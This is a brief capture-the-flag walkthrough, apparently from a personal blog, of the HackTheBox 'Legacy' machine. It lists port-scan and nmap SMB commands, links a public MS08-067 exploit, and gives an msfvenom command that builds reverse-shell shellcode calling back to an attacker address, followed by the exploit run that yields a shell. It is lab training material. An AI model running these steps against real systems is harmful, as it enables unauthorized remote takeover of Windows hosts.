HackTheBox >_ Legacy_4
Published on 20 Nov 2020
Legacy_4
rustscan 10.10.10.4 -b 924 -t 1500 --no-nmap
nmap -v -Pn -p 139,445 --script=smb-os-discovery 10.10.10.4
https://github.com/andyacer/ms08_067/blob/master/ms08_067_2018.py
生成shellcode 替换脚本中的部分
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=1337 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
python ms08-067.py 10.10.10.4 6 445
监听处立即获得shell